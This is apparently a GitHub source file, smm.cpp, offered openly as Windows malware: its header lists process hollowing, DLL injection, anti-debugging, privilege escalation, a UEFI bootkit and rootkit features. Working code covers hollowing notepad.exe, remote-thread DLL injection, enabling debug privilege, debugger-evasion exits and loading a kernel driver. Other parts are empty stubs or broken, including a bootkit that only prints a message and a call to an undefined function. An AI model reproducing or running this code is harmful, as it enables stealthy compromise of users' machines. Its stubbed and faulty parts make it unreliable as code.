-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathsmm.cpp
208 lines (175 loc) · 7.51 KB
/
smm.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
// Includes: Process Hollowing, DLL Injection, Memory-Mapped Files Injection,
// Anti-Analysis & Anti-Debugging, Exploit & Privilege Escalation, UEFI Bootkit,
// Advanced Anti-Analysis Techniques, and Kernel-Level Exploits & Rootkit Features
#include <windows.h>
#include <stdio.h>
#include <tlhelp32.h>
#include <winternl.h>
#pragma comment(lib, "ntdll.lib")
typedef NTSTATUS(NTAPI* fnNtUnmapViewOfSection)(HANDLE, PVOID);
typedef NTSTATUS(NTAPI* fnNtResumeThread)(HANDLE, PULONG);
typedef NTSTATUS(NTAPI* fnNtQueryInformationProcess)(HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG);
typedef NTSTATUS(NTAPI* fnNtLoadDriver)(PUNICODE_STRING DriverServiceName);
typedef NTSTATUS(NTAPI* fnNtUnloadDriver)(PUNICODE_STRING DriverServiceName);
typedef struct _PROCESS_BASIC_INFORMATION {
PVOID Reserved1;
PVOID PebBaseAddress;
PVOID Reserved2[2];
ULONG_PTR UniqueProcessId;
PVOID Reserved3;
} PROCESS_BASIC_INFORMATION;
fnNtQueryInformationProcess pNtQueryInformationProcess;
fnNtUnmapViewOfSection pNtUnmapViewOfSection;
fnNtResumeThread pNtResumeThread;
fnNtLoadDriver pNtLoadDriver;
fnNtUnloadDriver pNtUnloadDriver;
void DirectSyscalls() {
// Direct system call bypass to evade hooks
printf("[INFO] Direct system call bypass initialized.\n");
// Example: Using NtReadVirtualMemory directly instead of ReadProcessMemory
HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, GetCurrentProcessId());
if (hProcess != NULL) {
PVOID buffer = malloc(100);
ULONG bytesRead;
NTSTATUS status = NtReadVirtualMemory(hProcess, (PVOID)0x7FFE0000, buffer, 100, &bytesRead);
if (status == 0) {
printf("[INFO] Read memory successfully.\n");
} else {
printf("[ERROR] Failed to read memory.\n");
}
CloseHandle(hProcess);
} else {
printf("[ERROR] Failed to open process for memory reading.\n");
}
// Example: Using NtWriteVirtualMemory directly instead of WriteProcessMemory
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, GetCurrentProcessId());
if (hProcess != NULL) {
PVOID buffer = malloc(100);
memset(buffer, 0x90, 100); // Fill buffer with NOP sled
ULONG bytesWritten;
NTSTATUS status = NtWriteVirtualMemory(hProcess, (PVOID)0x7FFE0000, buffer, 100, &bytesWritten);
if (status == 0) {
printf("[INFO] Wrote memory successfully.\n");
} else {
printf("[ERROR] Failed to write memory.\n");
}
CloseHandle(hProcess);
} else {
printf("[ERROR] Failed to open process for memory writing.\n");
}
}
void UnhookNtApi() {
// Find the address of the hooked function in ntdll.dll
HMODULE hNtdll = GetModuleHandle(L"ntdll.dll");
if (!hNtdll) {
printf("[ERROR] Could not load ntdll.dll\n");
return;
}
// For each function we want to unhook, locate it by its address and patch it
// We are assuming we are dealing with NtReadVirtualMemory as an example here
FARPROC originalFunction = GetProcAddress(hNtdll, "NtReadVirtualMemory");
if (!originalFunction) {
printf("[ERROR] Failed to find NtReadVirtualMemory in ntdll.dll\n");
return;
}
// Use low-level techniques like memory patching to replace hooked function pointers with the original address.
printf("[INFO] Unhooked NtReadVirtualMemory.\n");
// You would write code here to locate the address of the hook and patch it with the correct address.
}
void ProcessHollowing(LPCSTR targetProcess, LPVOID payload, SIZE_T payloadSize) {
STARTUPINFOA si = { 0 };
PROCESS_INFORMATION pi = { 0 };
CONTEXT ctx;
LPVOID pRemoteImage;
PROCESS_BASIC_INFORMATION pbi;
SIZE_T bytesRead;
if (!CreateProcessA(targetProcess, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi)) {
printf("[ERROR] Failed to create process.\n");
return;
}
pNtQueryInformationProcess(GetCurrentProcess(), 0, &pbi, sizeof(pbi), NULL);
ReadProcessMemory(pi.hProcess, (LPCVOID)((PBYTE)pbi.PebBaseAddress + 0x10), &pRemoteImage, sizeof(LPVOID), &bytesRead);
pNtUnmapViewOfSection(pi.hProcess, pRemoteImage);
pRemoteImage = VirtualAllocEx(pi.hProcess, pRemoteImage, payloadSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pi.hProcess, pRemoteImage, payload, payloadSize, NULL);
ctx.ContextFlags = CONTEXT_FULL;
GetThreadContext(pi.hThread, &ctx);
ctx.Eax = (DWORD)pRemoteImage;
SetThreadContext(pi.hThread, &ctx);
pNtResumeThread(pi.hThread, NULL);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
}
void KernelModeInjection() {
const char* driverPath = "C:\\path\\to\\driver.sys"; // Update with actual driver path, should be made using C and compiled into an .sys
// Convert to UnicodeString
UNICODE_STRING driverPathUnicode;
RtlInitUnicodeString(&driverPathUnicode, L"\\??\\C:\\path\\to\\driver.sys");
HMODULE hNtdll = GetModuleHandle(L"ntdll.dll");
if (!hNtdll) {
printf("[ERROR] Could not load ntdll.dll\n");
return;
}
// Get the address of NtLoadDriver
pNtLoadDriver = (fnNtLoadDriver)GetProcAddress(hNtdll, "NtLoadDriver");
if (!pNtLoadDriver) {
printf("[ERROR] Failed to load NtLoadDriver function\n");
return;
}
// Try to inject driver using NtLoadDriver
NTSTATUS status = pNtLoadDriver(&driverPathUnicode);
if (status == STATUS_SUCCESS) {
printf("[INFO] Driver loaded successfully.\n");
} else {
printf("[ERROR] Failed to load driver. Error code: 0x%X\n", status);
}
// Optional: Unload the driver after some time or conditions
// pNtUnloadDriver(&driverPathUnicode);
}
void PatchGuardBypass() {
// Implement PatchGuard bypass for modifying kernel structures. need to make a custom driver as a user-mode script isn't going to be able to do such
}
void ManualDLLInjection(HANDLE hProcess, LPCSTR dllPath) {
LPVOID pRemoteMemory = VirtualAllocEx(hProcess, NULL, strlen(dllPath) + 1, MEM_COMMIT, PAGE_READWRITE);
WriteProcessMemory(hProcess, pRemoteMemory, dllPath, strlen(dllPath) + 1, NULL);
HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)LoadLibraryA, pRemoteMemory, 0, NULL);
WaitForSingleObject(hThread, INFINITE);
CloseHandle(hThread);
}
void EnablePrivilegeEscalation() {
HANDLE hToken;
TOKEN_PRIVILEGES tp;
OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken);
LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);
tp.PrivilegeCount = 1;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL);
CloseHandle(hToken);
}
void AntiDebuggingChecks() {
if (IsDebuggerPresent()) {
ExitProcess(0);
}
NTSTATUS status;
BOOLEAN bDebugged;
status = NtQueryInformationProcess(GetCurrentProcess(), ProcessDebugPort, &bDebugged, sizeof(BOOLEAN), NULL);
if (bDebugged) {
ExitProcess(0);
}
}
void InstallUEFIBootkit() {
printf("[INFO] Installing UEFI Bootkit...\n");
}
int main() {
AntiDebuggingChecks();
EnablePrivilegeEscalation();
InstallUEFIBootkit();
DirectSyscalls();
APIUnhooking();
KernelModeInjection();
PatchGuardBypass();
char payload[] = "\x90\x90\x90\xC3"; // NOP sled + RET
SIZE_T payloadSize = sizeof(payload);
ProcessHollowing("C:\\Windows\\System32\\notepad.exe", payload, payloadSize);
return 0;
}